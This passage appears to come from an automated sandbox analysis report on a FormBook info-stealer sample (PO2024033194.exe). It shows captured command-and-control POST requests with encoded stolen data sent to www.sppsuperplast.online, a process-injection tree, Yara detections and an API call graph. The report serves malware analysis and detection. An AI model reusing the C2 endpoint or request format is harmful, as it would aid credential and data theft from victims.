                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 41 54 49 30 48 31 44 53 43 75 6b 46 74 72 78 34 7a 61 30 54 4e 71 6d 64 6a 61 74 51 46 66 61 58 59 6a 48 43 4d 6b 74 76 53 63 4d 2b 7a 4c 50 30 6b 51 42 33 48 34 38 71 76 48 6a 75 2b 37 61 33 45 59 4d 6b 78 38 53 4c 75 75 74 71 70 33 32 54 4e 64 78 57 76 79 69 72 55 39 42 76 51 44 4b 4e 72 70 65 59 54 51 36 47 57 6d 4f 63 32 4c 4c 45 77 43 39 74 38 44 59 33 65 61 76 4c 73 53 46 6c 4a 42 44 53 78 52 41 4a 36 6f 71 44 78 6c 42 33 47 31 45 2b 4f 64 68 30 6d 46 51 37 51 6f 68 72 7a 72 6a 62 48 57 66 2b 70 48 39 6c 6b 6e 4d 58 79 34 70 4e 55 52 50 42 76 71 71 37 64 30 35 41 6e 32 36 6a 71 63 77 36 36 37 31 6a 6a 66 4c 71 32 74 4e 59 61 77 3d 3d
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pATI0H1DSCukFtrx4za0TNqmdjatQFfaXYjHCMktvScM+zLP0kQB3H48qvHju+7a3EYMkx8SLuutqp32TNdxWvyirU9BvQDKNrpeYTQ6GWmOc2LLEwC9t8DY3eavLsSFlJBDSxRAJ6oqDxlB3G1E+Odh0mFQ7QohrzrjbHWf+pH9lknMXy4pNURPBvqq7d05An26jqcw6671jjfLq2tNYaw==


                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                68192.168.2.64979485.159.66.9380
                                                                TimestampBytes transferredDirectionData
                                                                Sep 22, 2024 17:45:13.722671032 CEST1744OUTPOST /becc/ HTTP/1.1
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate, br
                                                                Accept-Language: en-US,en
                                                                Connection: close
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Content-Length: 1247
                                                                Cache-Control: no-cache
                                                                Host: www.sppsuperplast.online
                                                                Origin: http://www.sppsuperplast.online
                                                                Referer: http://www.sppsuperplast.online/becc/
                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
                                                                Data Raw: 69 34 66 54 62 56 3d 41 4f 71 41 6d 43 52 4f 38 78 35 70 41 54 49 30 48 31 44 53 43 75 6b 46 74 72 78 34 7a 61 30 54 4e 71 6d 64 6a 61 74 51 46 66 53 58 59 51 50 43 4e 46 74 76 54 63 4d 2b 39 72 50 31 6b 51 42 71 48 38 5a 68 76 48 2f 55 2b 35 53 33 46 37 45 6b 7a 4f 36 4c 67 75 74 71 6d 58 32 4f 4a 64 77 65 76 32 47 76 55 38 78 76 51 44 4b 4e 72 6f 75 59 54 45 6d 47 46 32 4f 66 78 4c 4c 59 30 43 39 42 38 43 39 43 65 61 6a 78 73 6a 6c 6c 51 69 72 53 7a 6a 6f 4a 6e 34 71 46 2f 46 42 76 47 77 64 2b 4f 64 39 34 6d 45 30 64 51 76 52 72 78 2f 61 79 55 48 72 6b 31 32 73 47 32 56 46 38 39 59 39 59 53 78 33 39 6b 49 76 4e 51 6b 41 70 72 41 4f 48 75 64 70 4b 30 4b 78 35 6f 49 43 70 32 76 73 38 4b 47 57 77 56 33 32 39 2f 64 47 73 53 41 33 63 2f 42 54 2b 4a 70 46 6f 68 4c 45 6a 46 56 4f 77 61 6f 68 6c 36 79 6c 70 37 31 49 6c 64 55 66 6c 6a 50 62 7a 2b 56 51 70 4e 6d 4e 56 4e 63 45 76 62 64 43 30 62 2b 56 4d 7a 6a 49 4d 50 6b 44 4f 58 57 79 46 36 64 41 67 58 62 62 4b 45 64 65 67 4a 5a 52 64 6d 34 5a 7a 37 57 6c [TRUNCATED]
                                                                Data Ascii: i4fTbV=AOqAmCRO8x5pATI0H1DSCukFtrx4za0TNqmdjatQFfSXYQPCNFtvTcM+9rP1kQBqH8ZhvH/U+5S3F7EkzO6LgutqmX2OJdwev2GvU8xvQDKNrouYTEmGF2OfxLLY0C9B8C9CeajxsjllQirSzjoJn4qF/FBvGwd+Od94mE0dQvRrx/ayUHrk12sG2VF89Y9YSx39kIvNQkAprAOHudpK0Kx5oICp2vs8KGWwV329/dGsSA3c/BT+JpFohLEjFVOwaohl6ylp71IldUfljPbz+VQpNmNVNcEvbdC0b+VMzjIMPkDOXWyF6dAgXbbKEdegJZRdm4Zz7Wl/WBtLzpnHr93WAgv1e/ufG8MWvd/CurLtXQdzgDXnnq3ypcmuWeud414pid0jJuh+LErlKbGJeT5PbCWxOnSvAZtMCHYzPyXY3WU+N83y2CPvbxfCCxMweGOalSpDY+S5nP0J51ViSw4x/n4fFFSZrhu8rrYR21Q8jm+xVwCBYWfM/BbYxUt51IaCFxEYztP+ZT1pNDDFocNhmLeBndtf2mE6Yb65VPp+5vbF4Sx+TaoBwVEn6RUaoSFO/uD92+R2llIeqMCrR8HeFhGpnXFOJUSv/PfHGpkbUAFbxm2oUul80hBHeC/QYPFBkJU7+i/6B8JIu0EljNP81ujpGmqtJPopHudMR0sm8YBGdGkCnJ816qZoHRfJmwFcYZ25Wy1DWocnD9jKo/ofvgPyDVvcTASV1yNmfWLinyCEbfjq9wh+XEO+V2BY1gmOGB7zpu63NY8Q1bjRcXNMBIKCf+JmGmeeAWKN1sPFvCpasKxrQxcFheeEjt8bNafyZQz2fzYoqN9B0kXP6FH/hmZjDMZvg/fiPz/JsgLfSPe321sclxBwtYvkFuZt3XRPQ1SewUZqc1WjTs5RfYTuuvRuoegHX1X3mlVhIke9hopq6eVKeDh2WxdyYN7uoZ2n/0+EFbyTVDJ+QBFUHuq0hrYMjR9sWotH7NEaGXRP+ [TRUNCATED]


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:11:40:37
                                                                Start date:22/09/2024
                                                                Path:C:\Users\user\Desktop\PO2024033194.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\PO2024033194.exe"
                                                                Imagebase:0x400000
                                                                File size:1'415'239 bytes
                                                                MD5 hash:1EEBF0360B466749CD46F9D7971C35CD
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:11:40:38
                                                                Start date:22/09/2024
                                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\PO2024033194.exe"
                                                                Imagebase:0xbf0000
                                                                File size:46'504 bytes
                                                                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:11:40:41
                                                                Start date:22/09/2024
                                                                Path:C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe"
                                                                Imagebase:0xb70000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:4
                                                                Start time:11:40:44
                                                                Start date:22/09/2024
                                                                Path:C:\Windows\SysWOW64\replace.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Windows\SysWOW64\replace.exe"
                                                                Imagebase:0x240000
                                                                File size:18'944 bytes
                                                                MD5 hash:A7F2E9DD9DE1396B1250F413DA2F6C08
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:11:41:09
                                                                Start date:22/09/2024
                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                Imagebase:0x7ff728280000
                                                                File size:676'768 bytes
                                                                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Execution Graph

                                                                  Execution Coverage:3.2%
                                                                  Dynamic/Decrypted Code Coverage:2%
                                                                  Signature Coverage:5%
                                                                  Total number of Nodes:1905
                                                                  Total number of Limit Nodes:37
                                                                  execution_graph 86101 4010e0 86104 401100 86101->86104 86103 4010f8 86105 401113 86104->86105 86107 401120 86105->86107 86108 401184 86105->86108 86109 40114c 86105->86109 86135 401182 86105->86135 86106 40112c DefWindowProcW 86106->86103 86107->86106 86149 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86107->86149 86142 401250 61 API calls __crtGetStringTypeA_stat 86108->86142 86111 401151 86109->86111 86112 40119d 86109->86112 86113 401219 86111->86113 86114 40115d 86111->86114 86116 4011a3 86112->86116 86117 42afb4 86112->86117 86113->86107 86120 401225 86113->86120 86118 401163 86114->86118 86119 42b01d 86114->86119 86115 401193 86115->86103 86116->86107 86126 4011b6 KillTimer 86116->86126 86127 4011db SetTimer RegisterWindowMessageW 86116->86127 86144 40f190 10 API calls 86117->86144 86123 42afe9 86118->86123 86124 40116c 86118->86124 86119->86106 86148 4370f4 52 API calls 86119->86148 86151 468b0e 74 API calls __crtGetStringTypeA_stat 86120->86151 86146 40f190 10 API calls 86123->86146 86124->86107 86130 401174 86124->86130 86125 42b04f 86150 40e0c0 74 API calls __crtGetStringTypeA_stat 86125->86150 86143 401000 Shell_NotifyIconW __crtGetStringTypeA_stat 86126->86143 86127->86115 86128 401204 CreatePopupMenu 86127->86128 86128->86103 86145 45fd57 65 API calls __crtGetStringTypeA_stat 86130->86145 86135->86106 86136 42afe4 86136->86115 86137 42b00e 86147 401a50 336 API calls 86137->86147 86138 4011c9 PostQuitMessage 86138->86103 86141 42afdc 86141->86106 86141->86136 86142->86115 86143->86138 86144->86115 86145->86141 86146->86137 86147->86135 86148->86135 86149->86125 86150->86135 86151->86136 86152 40bd20 86155 428194 86152->86155 86156 40bd2d 86152->86156 86153 40bd43 86154 4281bc 86174 45e987 86 API calls moneypunct 86154->86174 86155->86153 86155->86154 86158 4281b2 86155->86158 86162 40bd37 86156->86162 86175 4531b1 85 API calls 5 library calls 86156->86175 86173 40b510 VariantClear 86158->86173 86164 40bd50 86162->86164 86163 4281ba 86165 426cf1 86164->86165 86166 40bd63 86164->86166 86185 44cde9 52 API calls _memmove 86165->86185 86176 40bd80 86166->86176 86169 40bd73 86169->86153 86170 426cfc 86186 40e0a0 86170->86186 86172 426d02 86173->86163 86174->86156 86175->86162 86177 40bd8e 86176->86177 86181 40bdb7 _memmove 86176->86181 86178 40bded 86177->86178 86179 40bdad 86177->86179 86177->86181 86196 4115d7 86178->86196 86190 402f00 86179->86190 86181->86169 86184 4115d7 52 API calls 86184->86181 86185->86170 86187 40e0b2 86186->86187 86188 40e0a8 86186->86188 86187->86172 86230 403c30 52 API calls _memmove 86188->86230 86191 402f0c 86190->86191 86192 402f10 86190->86192 86191->86181 86193 4268c3 86192->86193 86194 4115d7 52 API calls 86192->86194 86195 402f51 moneypunct _memmove 86194->86195 86195->86181 86198 4115e1 _malloc 86196->86198 86199 40bdf6 86198->86199 86202 4115fd std::exception::exception 86198->86202 86207 4135bb 86198->86207 86199->86181 86199->86184 86201 411645 86223 418105 RaiseException 86201->86223 86206 41163b 86202->86206 86221 41130a 51 API calls __cinit 86202->86221 86205 411656 86222 4180af 46 API calls std::exception::operator= 86206->86222 86208 413638 _malloc 86207->86208 86212 4135c9 _malloc 86207->86212 86229 417f77 46 API calls __getptd_noexit 86208->86229 86209 4135d4 86209->86212 86224 418901 46 API calls __NMSG_WRITE 86209->86224 86225 418752 46 API calls 7 library calls 86209->86225 86226 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86209->86226 86212->86209 86213 4135f7 RtlAllocateHeap 86212->86213 86216 413624 86212->86216 86219 413622 86212->86219 86213->86212 86214 413630 86213->86214 86214->86198 86227 417f77 46 API calls __getptd_noexit 86216->86227 86228 417f77 46 API calls __getptd_noexit 86219->86228 86221->86206 86222->86201 86223->86205 86224->86209 86225->86209 86227->86219 86228->86214 86229->86214 86230->86187 86231 425ba2 86236 40e360 86231->86236 86233 425bb4 86252 41130a 51 API calls __cinit 86233->86252 86235 425bbe 86237 4115d7 52 API calls 86236->86237 86238 40e3ec GetModuleFileNameW 86237->86238 86253 413a0e 86238->86253 86240 40e421 _wcsncat 86256 413a9e 86240->86256 86243 4115d7 52 API calls 86244 40e45e _wcscpy 86243->86244 86259 40bc70 86244->86259 86248 40e4a9 86248->86233 86249 401c90 52 API calls 86250 40e4a1 _wcscat _wcslen _wcsncpy 86249->86250 86250->86248 86250->86249 86251 4115d7 52 API calls 86250->86251 86251->86250 86252->86235 86278 413801 86253->86278 86308 419efd 86256->86308 86260 4115d7 52 API calls 86259->86260 86261 40bc98 86260->86261 86262 4115d7 52 API calls 86261->86262 86263 40bca6 86262->86263 86264 40e4c0 86263->86264 86320 403350 86264->86320 86266 40e4cb RegOpenKeyExW 86267 427190 RegQueryValueExW 86266->86267 86268 40e4eb 86266->86268 86269 4271b0 86267->86269 86270 42721a RegCloseKey 86267->86270 86268->86250 86271 4115d7 52 API calls 86269->86271 86270->86250 86272 4271cb 86271->86272 86327 43652f 52 API calls 86272->86327 86274 4271d8 RegQueryValueExW 86275 42720e 86274->86275 86276 4271f7 86274->86276 86275->86270 86328 402160 86276->86328 86279 41389e 86278->86279 86286 41381a 86278->86286 86280 4139e8 86279->86280 86282 413a00 86279->86282 86305 417f77 46 API calls __getptd_noexit 86280->86305 86307 417f77 46 API calls __getptd_noexit 86282->86307 86284 4139ed 86306 417f25 10 API calls wcstoxq 86284->86306 86286->86279 86293 41388a 86286->86293 86300 419e30 46 API calls wcstoxq 86286->86300 86288 41396c 86288->86279 86289 413967 86288->86289 86291 41397a 86288->86291 86289->86240 86290 413929 86290->86279 86292 413945 86290->86292 86302 419e30 46 API calls wcstoxq 86290->86302 86304 419e30 46 API calls wcstoxq 86291->86304 86292->86279 86292->86289 86296 41395b 86292->86296 86293->86279 86299 413909 86293->86299 86301 419e30 46 API calls wcstoxq 86293->86301 86303 419e30 46 API calls wcstoxq 86296->86303 86299->86288 86299->86290 86300->86293 86301->86299 86302->86292 86303->86289 86304->86289 86305->86284 86306->86289 86307->86289 86309 419f13 86308->86309 86310 419f0e 86308->86310 86317 417f77 46 API calls __getptd_noexit 86309->86317 86310->86309 86316 419f2b 86310->86316 86312 419f18 86318 417f25 10 API calls wcstoxq 86312->86318 86315 40e454 86315->86243 86316->86315 86319 417f77 46 API calls __getptd_noexit 86316->86319 86317->86312 86318->86315 86319->86312 86321 403367 86320->86321 86322 403358 86320->86322 86323 4115d7 52 API calls 86321->86323 86322->86266 86324 403370 86323->86324 86325 4115d7 52 API calls 86324->86325 86326 40339e 86325->86326 86326->86266 86327->86274 86329 426daa 86328->86329 86330 40216b _wcslen 86328->86330 86343 40c600 86329->86343 86333 402180 86330->86333 86334 40219e 86330->86334 86332 426db5 86332->86275 86341 403bd0 52 API calls moneypunct 86333->86341 86342 4013a0 52 API calls 86334->86342 86337 402187 _memmove 86337->86275 86338 4021a5 86339 426db7 86338->86339 86340 4115d7 52 API calls 86338->86340 86340->86337 86341->86337 86342->86338 86344 40c619 86343->86344 86345 40c60a 86343->86345 86344->86332 86345->86344 86348 4026f0 86345->86348 86347 426d7a _memmove 86347->86332 86349 426873 86348->86349 86350 4026ff 86348->86350 86355 4013a0 52 API calls 86349->86355 86350->86347 86352 42687b 86353 4115d7 52 API calls 86352->86353 86354 42689e _memmove 86353->86354 86354->86347 86355->86352 86356 416454 86393 416c70 86356->86393 86358 416460 GetStartupInfoW 86359 416474 86358->86359 86394 419d5a HeapCreate 86359->86394 86361 4164cd 86362 4164d8 86361->86362 86477 41642b 46 API calls 3 library calls 86361->86477 86395 417c20 GetModuleHandleW 86362->86395 86365 4164de 86366 4164e9 __RTC_Initialize 86365->86366 86478 41642b 46 API calls 3 library calls 86365->86478 86414 41aaa1 GetStartupInfoW 86366->86414 86370 416503 GetCommandLineW 86427 41f584 GetEnvironmentStringsW 86370->86427 86374 416513 86433 41f4d6 GetModuleFileNameW 86374->86433 86376 41651d 86377 416528 86376->86377 86480 411924 46 API calls 3 library calls 86376->86480 86437 41f2a4 86377->86437 86380 41652e 86381 416539 86380->86381 86481 411924 46 API calls 3 library calls 86380->86481 86451 411703 86381->86451 86384 416541 86386 41654c __wwincmdln 86384->86386 86482 411924 46 API calls 3 library calls 86384->86482 86455 40d6b0 86386->86455 86389 41657c 86484 411906 46 API calls _doexit 86389->86484 86392 416581 __fcloseall 86393->86358 86394->86361 86396 417c34 86395->86396 86397 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86395->86397 86485 4178ff 49 API calls _free 86396->86485 86399 417c87 TlsAlloc 86397->86399 86402 417cd5 TlsSetValue 86399->86402 86403 417d96 86399->86403 86400 417c39 86400->86365 86402->86403 86404 417ce6 __init_pointers 86402->86404 86403->86365 86486 418151 InitializeCriticalSectionAndSpinCount 86404->86486 86406 417d91 86494 4178ff 49 API calls _free 86406->86494 86408 417d2a 86408->86406 86487 416b49 86408->86487 86411 417d76 86493 41793c 46 API calls 4 library calls 86411->86493 86413 417d7e GetCurrentThreadId 86413->86403 86415 416b49 __calloc_crt 46 API calls 86414->86415 86416 41aabf 86415->86416 86416->86416 86418 416b49 __calloc_crt 46 API calls 86416->86418 86420 4164f7 86416->86420 86422 41abb4 86416->86422 86423 41ac34 86416->86423 86417 41ac6a GetStdHandle 86417->86423 86418->86416 86419 41acce SetHandleCount 86419->86420 86420->86370 86479 411924 46 API calls 3 library calls 86420->86479 86421 41ac7c GetFileType 86421->86423 86422->86423 86424 41abe0 GetFileType 86422->86424 86425 41abeb InitializeCriticalSectionAndSpinCount 86422->86425 86423->86417 86423->86419 86423->86421 86426 41aca2 InitializeCriticalSectionAndSpinCount 86423->86426 86424->86422 86424->86425 86425->86420 86425->86422 86426->86420 86426->86423 86428 41f595 86427->86428 86429 41f599 86427->86429 86428->86374 86504 416b04 86429->86504 86431 41f5bb _memmove 86432 41f5c2 FreeEnvironmentStringsW 86431->86432 86432->86374 86434 41f50b _wparse_cmdline 86433->86434 86435 416b04 __malloc_crt 46 API calls 86434->86435 86436 41f54e _wparse_cmdline 86434->86436 86435->86436 86436->86376 86438 41f2bc _wcslen 86437->86438 86442 41f2b4 86437->86442 86439 416b49 __calloc_crt 46 API calls 86438->86439 86444 41f2e0 _wcslen 86439->86444 86440 41f336 86511 413748 86440->86511 86442->86380 86443 416b49 __calloc_crt 46 API calls 86443->86444 86444->86440 86444->86442 86444->86443 86445 41f35c 86444->86445 86448 41f373 86444->86448 86510 41ef12 46 API calls wcstoxq 86444->86510 86446 413748 _free 46 API calls 86445->86446 86446->86442 86517 417ed3 86448->86517 86450 41f37f 86450->86380 86452 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 86451->86452 86454 411750 __IsNonwritableInCurrentImage 86452->86454 86536 41130a 51 API calls __cinit 86452->86536 86454->86384 86456 42e2f3 86455->86456 86457 40d6cc 86455->86457 86537 408f40 86457->86537 86459 40d707 86541 40ebb0 86459->86541 86462 40d737 86544 411951 86462->86544 86467 40d751 86556 40f4e0 SystemParametersInfoW SystemParametersInfoW 86467->86556 86469 40d75f 86557 40d590 GetCurrentDirectoryW 86469->86557 86471 40d767 SystemParametersInfoW 86472 40d78d 86471->86472 86473 408f40 VariantClear 86472->86473 86474 40d79d 86473->86474 86475 408f40 VariantClear 86474->86475 86476 40d7a6 86475->86476 86476->86389 86483 4118da 46 API calls _doexit 86476->86483 86477->86362 86478->86366 86483->86389 86484->86392 86485->86400 86486->86408 86489 416b52 86487->86489 86490 416b8f 86489->86490 86491 416b70 Sleep 86489->86491 86495 41f677 86489->86495 86490->86406 86490->86411 86492 416b85 86491->86492 86492->86489 86492->86490 86493->86413 86494->86403 86496 41f683 86495->86496 86497 41f69e _malloc 86495->86497 86496->86497 86498 41f68f 86496->86498 86500 41f6b1 HeapAlloc 86497->86500 86502 41f6d8 86497->86502 86503 417f77 46 API calls __getptd_noexit 86498->86503 86500->86497 86500->86502 86501 41f694 86501->86489 86502->86489 86503->86501 86507 416b0d 86504->86507 86505 4135bb _malloc 45 API calls 86505->86507 86506 416b43 86506->86431 86507->86505 86507->86506 86508 416b24 Sleep 86507->86508 86509 416b39 86508->86509 86509->86506 86509->86507 86510->86444 86512 41377c _free 86511->86512 86513 413753 RtlFreeHeap 86511->86513 86512->86442 86513->86512 86514 413768 86513->86514 86520 417f77 46 API calls __getptd_noexit 86514->86520 86516 41376e GetLastError 86516->86512 86521 417daa 86517->86521 86520->86516 86522 417dc9 __crtGetStringTypeA_stat __call_reportfault 86521->86522 86523 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86522->86523 86526 417eb5 __call_reportfault 86523->86526 86525 417ed1 GetCurrentProcess TerminateProcess 86525->86450 86527 41a208 86526->86527 86528 41a210 86527->86528 86529 41a212 IsDebuggerPresent 86527->86529 86528->86525 86535 41fe19 86529->86535 86532 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86533 421ff0 __call_reportfault 86532->86533 86534 421ff8 GetCurrentProcess TerminateProcess 86532->86534 86533->86534 86534->86525 86535->86532 86536->86454 86538 408f48 moneypunct 86537->86538 86539 4265c7 VariantClear 86538->86539 86540 408f55 moneypunct 86538->86540 86539->86540 86540->86459 86597 40ebd0 86541->86597 86601 4182cb 86544->86601 86546 41195e 86608 4181f2 LeaveCriticalSection 86546->86608 86548 40d748 86549 4119b0 86548->86549 86550 4119d6 86549->86550 86551 4119bc 86549->86551 86550->86467 86551->86550 86643 417f77 46 API calls __getptd_noexit 86551->86643 86553 4119c6 86644 417f25 10 API calls wcstoxq 86553->86644 86555 4119d1 86555->86467 86556->86469 86645 401f20 86557->86645 86559 40d5b6 IsDebuggerPresent 86560 40d5c4 86559->86560 86561 42e1bb MessageBoxA 86559->86561 86562 42e1d4 86560->86562 86563 40d5e3 86560->86563 86561->86562 86818 403a50 52 API calls 3 library calls 86562->86818 86715 40f520 86563->86715 86567 40d5fd GetFullPathNameW 86727 401460 86567->86727 86569 40d63b 86570 40d643 86569->86570 86571 42e231 SetCurrentDirectoryW 86569->86571 86572 40d64c 86570->86572 86819 432fee 6 API calls 86570->86819 86571->86570 86742 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86572->86742 86575 42e252 86575->86572 86577 42e25a GetModuleFileNameW 86575->86577 86579 42e274 86577->86579 86580 42e2cb GetForegroundWindow ShellExecuteW 86577->86580 86820 401b10 86579->86820 86586 40d688 86580->86586 86582 40d669 86750 4091e0 86582->86750 86583 40d656 86583->86582 86816 40e0c0 74 API calls __crtGetStringTypeA_stat 86583->86816 86589 40d692 SetCurrentDirectoryW 86586->86589 86589->86471 86591 42e28d 86827 40d200 52 API calls 2 library calls 86591->86827 86594 42e299 GetForegroundWindow ShellExecuteW 86595 42e2c6 86594->86595 86595->86586 86596 40ec00 LoadLibraryA GetProcAddress 86596->86462 86598 40d72e 86597->86598 86599 40ebd6 LoadLibraryA 86597->86599 86598->86462 86598->86596 86599->86598 86600 40ebe7 GetProcAddress 86599->86600 86600->86598 86602 4182e0 86601->86602 86603 4182f3 EnterCriticalSection 86601->86603 86609 418209 86602->86609 86603->86546 86605 4182e6 86605->86603 86636 411924 46 API calls 3 library calls 86605->86636 86608->86548 86610 418215 __fcloseall 86609->86610 86611 418225 86610->86611 86612 41823d 86610->86612 86637 418901 46 API calls __NMSG_WRITE 86611->86637 86615 416b04 __malloc_crt 45 API calls 86612->86615 86620 41824b __fcloseall 86612->86620 86614 41822a 86638 418752 46 API calls 7 library calls 86614->86638 86616 418256 86615->86616 86618 41825d 86616->86618 86619 41826c 86616->86619 86640 417f77 46 API calls __getptd_noexit 86618->86640 86623 4182cb __lock 45 API calls 86619->86623 86620->86605 86621 418231 86639 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86621->86639 86625 418273 86623->86625 86627 4182a6 86625->86627 86628 41827b InitializeCriticalSectionAndSpinCount 86625->86628 86631 413748 _free 45 API calls 86627->86631 86629 418297 86628->86629 86630 41828b 86628->86630 86642 4182c2 LeaveCriticalSection _doexit 86629->86642 86632 413748 _free 45 API calls 86630->86632 86631->86629 86634 418291 86632->86634 86641 417f77 46 API calls __getptd_noexit 86634->86641 86637->86614 86638->86621 86640->86620 86641->86629 86642->86620 86643->86553 86644->86555 86828 40e6e0 86645->86828 86649 401f41 GetModuleFileNameW 86846 410100 86649->86846 86651 401f5c 86858 410960 86651->86858 86654 401b10 52 API calls 86655 401f81 86654->86655 86861 401980 86655->86861 86657 401f8e 86658 408f40 VariantClear 86657->86658 86659 401f9d 86658->86659 86660 401b10 52 API calls 86659->86660 86661 401fb4 86660->86661 86662 401980 53 API calls 86661->86662 86663 401fc3 86662->86663 86664 401b10 52 API calls 86663->86664 86665 401fd2 86664->86665 86869 40c2c0 86665->86869 86667 401fe1 86668 40bc70 52 API calls 86667->86668 86669 401ff3 86668->86669 86887 401a10 86669->86887 86671 401ffe 86894 4114ab 86671->86894 86674 428b05 86676 401a10 52 API calls 86674->86676 86675 402017 86677 4114ab __wcsicoll 58 API calls 86675->86677 86678 428b18 86676->86678 86679 402022 86677->86679 86681 401a10 52 API calls 86678->86681 86679->86678 86680 40202d 86679->86680 86682 4114ab __wcsicoll 58 API calls 86680->86682 86683 428b33 86681->86683 86684 402038 86682->86684 86686 428b3b GetModuleFileNameW 86683->86686 86685 402043 86684->86685 86684->86686 86687 4114ab __wcsicoll 58 API calls 86685->86687 86688 401a10 52 API calls 86686->86688 86689 40204e 86687->86689 86690 428b6c 86688->86690 86693 428b90 _wcscpy 86689->86693 86696 401a10 52 API calls 86689->86696 86706 402092 86689->86706 86691 40e0a0 52 API calls 86690->86691 86694 428b7a 86691->86694 86692 